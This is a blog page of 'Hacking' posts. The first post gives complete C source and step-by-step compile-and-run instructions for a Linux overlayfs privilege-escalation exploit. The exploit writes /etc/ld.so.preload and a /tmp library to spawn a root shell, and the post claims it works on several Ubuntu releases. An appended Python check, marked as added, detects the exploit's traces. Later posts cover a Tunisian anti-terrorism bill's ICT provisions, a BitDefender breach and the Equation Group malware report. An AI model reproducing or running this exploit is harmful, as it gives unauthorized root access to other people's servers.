
Showing posts with label Hacking. Show all posts
Thursday, February 18, 2016
Friday, December 11, 2015

I will show you how hackers gain root access to your Linux VPS server. This exploit still works nowadays.
The process is explained in detail following this demo:
First: create a C file "privilege_escalation.c".

Put this code in the file:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    fprintf(stderr,"spawning threads\n");
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");
    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
Second step: compile and build the program.
To create the executable, run this command:
user@ubuntu-server-1504:~$ gcc privilege_escalation.c -o privilege_escalation
This will make an executable program called privilege_escalation.

Final step: get access to a shell as root (running the exploit).

Execute the exploit with this command:
user@ubuntu-server-1504:~$ ./privilege_escalation

This will generate a root terminal.
This exploit works on Ubuntu 12.04, 14.04, 14.10, 15.04
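
Added example, not part of the original post: a host check for the on-disk traces the code above leaves, namely an /etc/ld.so.preload that is world-writable (the chmod 0777 call) and that names a library under /tmp (/tmp/ofs-lib.so). The function names and the list of world-writable directories are assumptions made for this sketch.

```python
import os
import stat

PRELOAD = "/etc/ld.so.preload"
# Assumption: directories treated as writable by any local user on a typical host.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_preload(text):
    """Split ld.so.preload content into library paths.

    glibc separates entries by whitespace or ':' and treats '#' as a comment start.
    """
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(line.replace(":", " ").split())
    return entries


def audit_preload(text, mode, uid):
    """Return findings for the file's content, st_mode and owner uid."""
    findings = []
    if uid != 0:
        findings.append("owner is uid %d, not root" % uid)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("mode %o is group/world-writable" % stat.S_IMODE(mode))
    for lib in parse_preload(text):
        if os.path.normpath(lib).startswith(WORLD_WRITABLE_DIRS):
            findings.append("preloads library from world-writable dir: " + lib)
    return findings


def audit_host(path=PRELOAD):
    """Audit the live file; an absent file is the normal state and yields no findings."""
    try:
        st = os.stat(path)
        with open(path, errors="replace") as fh:
            text = fh.read()
    except FileNotFoundError:
        return []
    return audit_preload(text, st.st_mode, st.st_uid)


# Constructed sample: the content and mode that the code on this page writes.
SAMPLE = ("/tmp/ofs-lib.so\n", 0o100777, 0)

if __name__ == "__main__":
    for finding in audit_preload(*SAMPLE) + audit_host():
        print("ld.so.preload:", finding)
```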


12:29 PM

Monday, August 3, 2015
The Assembly of the Representatives of the People (ARP) is currently continuing its study, in committee, of the anti-terrorism Act. On the evening of Monday, July 6, the Minister of the Interior, Mohamed Najem Gharssali, was heard by the various committees in a meeting held behind closed doors.
At this hearing, on the ICT dimension, the Minister of the Interior spoke with MEPs about how his Ministry is now working with social networks (Facebook, Twitter, etc.) to hunt down people who hide behind accounts that are apologists for terrorism. Mohamed Najem Gharssali also referred to cyber-surveillance and the use of ICT for terrorist purposes.
The Minister of the Interior admitted that the Ministry's executives do not actually have adequate training to combat cybercrime, but said this will be remedied soon. The Minister nevertheless reminded MEPs several times that his Department is committed to respecting the privacy of Internet users. Before the plenary session, it is interesting for us to do a quick read of the anti-terrorist Act, especially its ICT component. What does this new law bring? Counsel Sana Mason, Member of Ennahdha in the ARP, noted in a speech on Shems FM on Friday, July 3 that it is precisely the ICT dimension which is the great novelty of this anti-terrorist Act.

Indeed, article 13 of the new law defines any act of damage to telecommunications networks or information systems as a terrorist act. For this, sanctions can range from 5 years to 20 years in prison with a fine whose value varies between 50,000 and 100,000 dinars.
In article 15, the Bill is specific on the matter of transport and facilitation of transport of electronic or computer hardware or software that could be used to design, manufacture, or carry biological, chemical or nuclear weapons.
Then, in article 30, the Bill considers glorifying a terrorist or a terrorist organization, as well as its ideas and opinions, to be part of a terrorist act. Thus, a straightforward interpretation of this article is that anyone who publishes on Twitter or Facebook a post showing support for terrorist groups is well and truly considered a terrorist in the eyes of the law. He is liable to a term of imprisonment of up to 5 years and a fine ranging from 5 to 10 thousand dinars.
In article 33, the draft Bill considers it a terrorist act to provide equipment, web sites, documents, or photos for the commission of a terrorist crime. In this article, the first question that comes to mind is the following: is a hosting provider thus itself considered a terrorist? Because in that case, this covers large hosts like GoDaddy, OVH or even our own telephone operators, which themselves provide cloud hosting solutions.
In article 49, the Bill gives the counter-terrorism legal pole the power to decide on the deletion or censorship of audio, audiovisual or digital publications, or computer data, that are related to acts of terrorism.
On this point, the question that should be asked concerns the framing of the types of content that may or may not be relayed by the media in the context of their journalistic work. Thus, if an online media outlet relays a screenshot of an account that publishes photos praising terrorism, will it be obliged to censor the content?
PS: How will this pole delete it? By contacting the administrator of the medium and sending him a requisition, with a receipt and a requisition processing time? Or will they be granted the right to hack the said digital media and delete the contents? And then, how will they deal with foreign media? Are they going to send them 'international' requisitions? Or apply this procedure only to media based or hosted in Tunisia?
The Assembly of the Representatives of the People continues its discussion of the anti-terrorism Act in committees. We concentrated on the ICT part of this law, which provides for fines and prison sentences for all those who broadcast messages glorifying terrorists on the Net as well as those who use ICTs to sow terror (see the first part of the article). This second part continues to unravel other ICT aspects of the said Act.
Article 52 of this Bill deals with the interception of communications. This interception includes traffic data, listening, exploring the content of communications, and saving or copying it. The article thus cites the need for involvement of the Technical Telecommunications Agency (A2T), telecommunications operators, access network operators, internet access and service providers, etc.
An interception operation may not last more than four months, renewable one time, and can be triggered only by a decision of the public prosecutor or an investigating judge.

In the event that the interception operation does not result in a criminal trial, article 54 provides that the data collected are subject to protection as dictated by the laws on the protection of personal data. That said, it is worth mentioning that the Bill cites no reference to the laws in question!

The Bill defines in its article 59 what audio-visual control is. It is the putting in place of technical means for filming, in particular, suspects in a case of terrorist crime. According to the Bill, the technical means can be deployed in private or public places, or in private or public vehicles (metro/bus/train). The Bill also allows these technologies to be deployed without the private owners of the vehicles or places in question knowing about it or accepting it.
Still, the article in question states that the data collected are subject to protection as dictated by the laws in the field of protection of personal data, again without any specific reference to these laws.
Article 60 also states that any person who intentionally distributes data collected during interception or audio-visual control operations is sentenced to 10 years in prison.
Then section 63 defines the constitution of the national counter-terrorism Committee. It is worth mentioning that among the 6 members of the Committee, a seat is reserved for the National Instance for the Protection of Personal Data.
This Committee's role is to propose a national strategy to combat terrorism. The Committee is responsible for international coordination with foreign partners in the fight against terrorism. Note that this Bill, which should be adopted urgently by the Parliament, remains incomplete to date. Indeed, while the rapporteur of the commission on general legislation declares that the contribution of this new Bill is really the coverage of ICT aspects in terrorist crimes, we do not find that the question has been treated with care. Take only the definitions of what is meant by "damage an information system or a telecommunications network", which remain very ambiguous.
Indeed, the Bill has reserved two whole pages to define biological, chemical and nuclear weapons. But no definition of the terms relating to information and communication technologies has been listed. Very vague terms such as "technical means" or "digital publishing" open the door to several interpretations. The issue of cybercrime is first and foremost a question in its own right, which should be treated separately by settling all the contentious issues. We recall as well that the cybercrime Bill has not yet been submitted to the Ministerial Council. Yet this law should be a legal reference for crimes on the Internet and will define, much more clearly, these "technical means."
Note that the National Instance for the Protection of Personal Data, to which this Bill assigns an important role, has no technical expert in its composition.

Marwen Dhemaied

4:59 PM

Sunday, August 2, 2015
Financial services and e-shopping sites are one thing, but we at least expect security companies and antivirus software vendors to keep our data secure and encrypted.

One of the best known companies in the field of information security, which produces the highly respected antivirus program "BitDefender", has been breached, and part of the data of many of its customers was stolen.

The breach of data belonging to many "BitDefender" clients is quite awkward for a security company, not because of the company's inability to prevent hackers from infiltrating, but because the company keeps a large part of its clients' sensitive data without encryption!

Something unexpected from a security firm of that size.

It seems that a hacker who goes by the alias "DetoxRansome" was able to penetrate a cloud-based BitDefender server that hosts the admin panel for small and medium-sized enterprises, and the hacker was able to steal many usernames and passwords.

What is really disturbing about the BitDefender hack is that the login data was completely unencrypted!

The Romanian information security company acknowledged that it had been penetrated and said the attack on its system did not penetrate the entire server, but that a vulnerability exposed many user accounts and passwords; it is believed to be an SQL injection vulnerability.

It is noteworthy that the hacker had a limited amount of customer account information, and threatened to leak the information obtained unless BitDefender paid him a ransom of $15,000.

The list the hacker disclosed over the weekend contains approximately 250 user names and passwords for BitDefender accounts.

However, the company refused to pay the ransom requested by the hacker, and the company is now collaborating with the security investigation into the hack.

While the hack affected only 1% of the company's clients, we are disappointed that a company of this size failed to implement the necessary security measures to protect its customers.

4:37 PM

Saturday, March 14, 2015
Monday, March 9, 2015
Tuesday, February 17, 2015
The security firm Kaspersky has discovered a group of hackers using sophisticated malware that settles in the heart of hard drives. Their activities have been linked to the American intelligence agency.

For at least fourteen years, a group of hackers has managed to conduct hundreds of large-scale attacks in 30 countries, without ever being disturbed. Named "Equation", this group was outed by computer security firm Kaspersky, in a report published Tuesday. What it reveals suggests that these hackers were linked to the NSA, the American intelligence agency that designed the PRISM program for surveillance of the Net.
Kaspersky never named the NSA in its report. The link with Equation lies in the nature of the weapons used. One of the viruses developed by the group in 2008, called Fanny, uses the same security flaws as Stuxnet, a spyware program that was spying on Iranian nuclear infrastructure. "The similar use of the same flaws in two different viruses, at around the same time, indicates that the Equation Group and the developers of Stuxnet are the same people or work closely together," says the report. The flaws were even used in Fanny before Stuxnet. However, according to the revelations of whistleblower Edward Snowden, the NSA and Israel co-authored Stuxnet. Another clue: malicious software from Equation included in its code the same name as an NSA tool unveiled by The Intercept last March, the Ars Technica website points out.

Undetectable malware:

More than 500 infected computers have been detected by Kaspersky, in 42 countries, many of them monitored by the United States: Iran, Pakistan, Syria, etc. France is said to have been affected to a lesser extent. The first Equation operation dates back to 2001, "perhaps even 1996", says the report. The targets ranged from governments to diplomatic missions, the military, media, Islamic organizations and the telecoms, hydrocarbons, nuclear energy, nanotechnology and finance sectors.
Fanny and Stuxnet both targeted "air-gapped" computers, i.e. those not connected to the Internet. Fanny could hide in an invisible part of a USB key; when the key was connected to a non-connected computer, it analyzed its data. Another mode of contamination was through compromised Web pages. Kaspersky cites the case of jihadist discussion forums or advertisements on popular sites in the Middle East.
The malicious software infected a specific part of the hard drive, its internal software, and remained invisible. To achieve this feat, the creators of the program had to know the source code of the target computer's hard disk. Former agents contacted by the Reuters news agency confirmed that the NSA was able to hide spyware in hard drives from many major manufacturers, such as Western Digital or Toshiba. Many of these manufacturers told Reuters they had no knowledge of Equation's spyware. Western Digital said that the company did not communicate the source code of its hard drives to governmental agencies.
"The Death Star of the malware galaxy":
Kaspersky portrays Equation as one of the most experienced hacker groups in the world. It "transcends all that is known in terms of complexity and sophistication of techniques" and is "unique in almost all aspects of its activities". Never running out of superlatives, it even nicknamed Equation the "Death Star of the malware galaxy".
Kaspersky takes the bulk of its revenue from sales of antivirus and protection software. It is in its best interest to present its discoveries and the threats it reveals as major. On Monday, February 16, the company unveiled a series of bank hacks that led to the theft of 300 million dollars since 2013. "It is probably the most sophisticated attack in the world in terms of tactics and methods", the head of Kaspersky North America, Chris Doggett, told the New York Times.
Several of the vulnerabilities exploited by Equation were of the 'zero-day' kind: security vulnerabilities which have not yet been discovered or used, and which require a high level of expertise. These flaws are in the crosshairs of all large companies. This summer, Google launched Project Zero, a team of former hackers assembled to track down and repair 'zero-day' flaws.

11:29 AM
